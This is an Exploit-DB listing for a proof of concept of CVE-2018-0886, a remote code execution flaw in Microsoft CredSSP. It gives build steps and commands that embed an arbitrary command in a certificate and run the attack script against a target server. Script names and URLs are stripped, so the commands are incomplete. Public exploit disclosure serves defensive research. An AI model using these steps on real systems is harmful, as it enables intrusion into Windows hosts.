Microsoft Credential Security Support Provider - Remote Code Execution

EDB-ID: 44453
Author: Preempt
Published: 2018-04-13
CVE: CVE-2018-0886
Type: Remote
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(, allowing also credssp relay.

Written by Eyal Karni, Preempt
[email protected]

# Build

## Instructions (Linux)
If you are using Ubuntu 14 , check the install file..
It was tested on Ubuntu 16.04.

$ git clone rdpy
$ git clone
$ cd credssp/install
$ sh
$ cd ../../rdpy
$ sudo python install

EDB Mirror:

* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).
* A different version of openssl needed to be installed for this to run successfully. The install script does that.
* Please follow the instructions in the described order.

# Running the exploit

Export a certificate suitable for Server Authentication from any domain.

To generate a suitable certificate for the command to execute :

$ python credssp/bin/ -c ExportedCert -o exploitc.pem -k exploitk.pem CMD

(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)

To run the attack script:

$ python /usr/local/bin/ -k exploitk.pem -c exploitc.pem TargetServer

More details are in the usage section of the scripts(--help).

Related Posts